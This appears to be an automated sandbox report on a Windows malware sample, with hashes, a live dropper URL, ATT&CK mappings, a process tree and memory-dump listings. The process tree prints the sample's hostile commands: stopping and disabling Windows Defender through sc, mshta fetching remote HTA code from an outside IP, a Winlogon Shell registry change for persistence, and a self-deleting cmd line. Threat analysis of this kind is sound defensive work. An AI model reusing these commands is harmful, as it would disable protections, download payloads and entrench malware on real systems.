73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
30/12/2023, 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

197d8655ed6900478b74c479fe2a1fd9.exe
Size

2.2MB
MD5

197d8655ed6900478b74c479fe2a1fd9
SHA1

0225e85f1d912e719fec67d379f19a28625ceaa6
SHA256

73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91
SHA512

6479e6ed498cdf81ba8e4e726a5f2faa7cc8d7cb2489bbd2bc1db2f277fde6d1ab5a5720bafa7116a5a083c76c1ca415840dd820b83d8d93f992a3b04765781f
SSDEEP

49152:7sgqSiGCeSWxUs9cY+fN11ivBzV+3ZYqjuPOBW0wtuVXIPcOU7m6MICD5:7nqFveZb9LKYvT+3SiiO8Lc5OU7a5

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=AVCIKYMG&2=i-s&3=63&4=9200&5=6&6=2&7=919041&8=1033

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\ouaisv.exe"	ouaisv.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	2284	mshta.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	197d8655ed6900478b74c479fe2a1fd9.exe

Executes dropped EXE 1 IoCs

pid	Process
1908	ouaisv.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3344	sc.exe
2136	sc.exe
628	sc.exe
3848	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1908	ouaisv.exe
Token: SeShutdownPrivilege	1908	ouaisv.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe
1908	ouaisv.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1908	ouaisv.exe
1908	ouaisv.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 628	2928	197d8655ed6900478b74c479fe2a1fd9.exe	23
PID 2928 wrote to memory of 628	2928	197d8655ed6900478b74c479fe2a1fd9.exe	23
PID 2928 wrote to memory of 628	2928	197d8655ed6900478b74c479fe2a1fd9.exe	23
PID 2928 wrote to memory of 2136	2928	197d8655ed6900478b74c479fe2a1fd9.exe	22
PID 2928 wrote to memory of 2136	2928	197d8655ed6900478b74c479fe2a1fd9.exe	22
PID 2928 wrote to memory of 2136	2928	197d8655ed6900478b74c479fe2a1fd9.exe	22
PID 2928 wrote to memory of 1908	2928	197d8655ed6900478b74c479fe2a1fd9.exe	21
PID 2928 wrote to memory of 1908	2928	197d8655ed6900478b74c479fe2a1fd9.exe	21
PID 2928 wrote to memory of 1908	2928	197d8655ed6900478b74c479fe2a1fd9.exe	21
PID 2928 wrote to memory of 1860	2928	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2928 wrote to memory of 1860	2928	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2928 wrote to memory of 1860	2928	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 1908 wrote to memory of 3344	1908	ouaisv.exe	30
PID 1908 wrote to memory of 3344	1908	ouaisv.exe	30
PID 1908 wrote to memory of 3344	1908	ouaisv.exe	30
PID 1908 wrote to memory of 3848	1908	ouaisv.exe	24
PID 1908 wrote to memory of 3848	1908	ouaisv.exe	24
PID 1908 wrote to memory of 3848	1908	ouaisv.exe	24
PID 1908 wrote to memory of 2284	1908	ouaisv.exe	27
PID 1908 wrote to memory of 2284	1908	ouaisv.exe	27
PID 1908 wrote to memory of 2284	1908	ouaisv.exe	27

C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe
"C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Users\Admin\AppData\Roaming\ouaisv.exe
  C:\Users\Admin\AppData\Roaming\ouaisv.exe
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3848
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=AVCIKYMG&2=i-s&3=63&4=9200&5=6&6=2&7=919041&8=1033"
    3⤵
    - Blocklisted process makes network request
    PID:2284
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:3344
- C:\Windows\SysWOW64\sc.exe
  sc config WinDefend start= disabled
  2⤵
  - Launches sc.exe
  PID:2136
- C:\Windows\SysWOW64\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\197D86~1.EXE" >> NUL
  2⤵
  PID:1860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1908-136-0x0000000000400000-0x0000000000842000-memory.dmp

Filesize
4.3MB

Download
memory/2928-0-0x0000000000400000-0x0000000000842000-memory.dmp

Filesize
4.3MB

Download
memory/2928-1-0x0000000000E90000-0x0000000000EF0000-memory.dmp

Filesize
384KB

Download
memory/2928-2-0x0000000000E60000-0x0000000000E61000-memory.dmp

Filesize
4KB

Download
memory/2928-3-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/2928-40-0x0000000003820000-0x0000000003821000-memory.dmp

Filesize
4KB

Download
memory/2928-63-0x0000000003A30000-0x0000000003A31000-memory.dmp

Filesize
4KB

Download
memory/2928-112-0x0000000000400000-0x0000000000842000-memory.dmp

Filesize
4.3MB

Download
memory/2928-62-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/2928-61-0x0000000003E10000-0x0000000003E11000-memory.dmp

Filesize
4KB

Download
memory/2928-60-0x0000000003E20000-0x0000000003E21000-memory.dmp

Filesize
4KB

Download
memory/2928-59-0x0000000003AB0000-0x0000000003AB1000-memory.dmp

Filesize
4KB

Download
memory/2928-58-0x0000000003AC0000-0x0000000003AC1000-memory.dmp

Filesize
4KB

Download
memory/2928-57-0x0000000003A80000-0x0000000003A81000-memory.dmp

Filesize
4KB

Download
memory/2928-56-0x0000000003A90000-0x0000000003A91000-memory.dmp

Filesize
4KB

Download
memory/2928-55-0x0000000003A60000-0x0000000003A61000-memory.dmp

Filesize
4KB

Download
memory/2928-54-0x0000000003A70000-0x0000000003A71000-memory.dmp

Filesize
4KB

Download
memory/2928-53-0x0000000003A40000-0x0000000003A41000-memory.dmp

Filesize
4KB

Download
memory/2928-52-0x0000000003A50000-0x0000000003A51000-memory.dmp

Filesize
4KB

Download
memory/2928-51-0x0000000003A20000-0x0000000003A21000-memory.dmp

Filesize
4KB

Download
memory/2928-50-0x0000000003A00000-0x0000000003A01000-memory.dmp

Filesize
4KB

Download
memory/2928-49-0x0000000003A10000-0x0000000003A11000-memory.dmp

Filesize
4KB

Download
memory/2928-48-0x00000000039E0000-0x00000000039E1000-memory.dmp

Filesize
4KB

Download
memory/2928-47-0x00000000039F0000-0x00000000039F1000-memory.dmp

Filesize
4KB

Download
memory/2928-46-0x00000000039C0000-0x00000000039C1000-memory.dmp

Filesize
4KB

Download
memory/2928-45-0x00000000039D0000-0x00000000039D1000-memory.dmp

Filesize
4KB

Download
memory/2928-44-0x00000000039A0000-0x00000000039A1000-memory.dmp

Filesize
4KB

Download
memory/2928-43-0x00000000039B0000-0x00000000039B1000-memory.dmp

Filesize
4KB

Download
memory/2928-42-0x0000000003980000-0x0000000003981000-memory.dmp

Filesize
4KB

Download
memory/2928-41-0x0000000003990000-0x0000000003991000-memory.dmp

Filesize
4KB

Download
memory/2928-39-0x0000000003830000-0x0000000003831000-memory.dmp

Filesize
4KB

Download
memory/2928-38-0x0000000003800000-0x0000000003801000-memory.dmp

Filesize
4KB

Download
memory/2928-37-0x0000000003810000-0x0000000003811000-memory.dmp

Filesize
4KB

Download
memory/2928-36-0x00000000037E0000-0x00000000037E1000-memory.dmp

Filesize
4KB

Download
memory/2928-35-0x00000000037F0000-0x00000000037F1000-memory.dmp

Filesize
4KB

Download
memory/2928-34-0x0000000002AE0000-0x0000000002AE1000-memory.dmp

Filesize
4KB

Download
memory/2928-33-0x00000000037D0000-0x00000000037D1000-memory.dmp

Filesize
4KB

Download
memory/2928-32-0x0000000002970000-0x0000000002971000-memory.dmp

Filesize
4KB

Download
memory/2928-31-0x0000000002A30000-0x0000000002A31000-memory.dmp

Filesize
4KB

Download
memory/2928-30-0x00000000028C0000-0x00000000028C1000-memory.dmp

Filesize
4KB

Download
memory/2928-29-0x0000000003780000-0x0000000003781000-memory.dmp

Filesize
4KB

Download
memory/2928-28-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2928-27-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/2928-26-0x00000000037C0000-0x00000000037C1000-memory.dmp

Filesize
4KB

Download
memory/2928-25-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/2928-24-0x0000000003750000-0x0000000003752000-memory.dmp

Filesize
8KB

Download
memory/2928-23-0x00000000037B0000-0x00000000037B1000-memory.dmp

Filesize
4KB

Download
memory/2928-22-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2928-21-0x0000000002930000-0x0000000002931000-memory.dmp

Filesize
4KB

Download
memory/2928-20-0x0000000002910000-0x0000000002911000-memory.dmp

Filesize
4KB

Download
memory/2928-19-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/2928-18-0x00000000028E0000-0x00000000028E1000-memory.dmp

Filesize
4KB

Download
memory/2928-17-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/2928-16-0x00000000028A0000-0x00000000028A1000-memory.dmp

Filesize
4KB

Download
memory/2928-15-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/2928-14-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/2928-13-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/2928-12-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/2928-11-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download
memory/2928-10-0x0000000003760000-0x0000000003762000-memory.dmp

Filesize
8KB

Download
memory/2928-9-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/2928-8-0x0000000003770000-0x0000000003771000-memory.dmp

Filesize
4KB

Download
memory/2928-7-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/2928-6-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/2928-5-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/2928-4-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download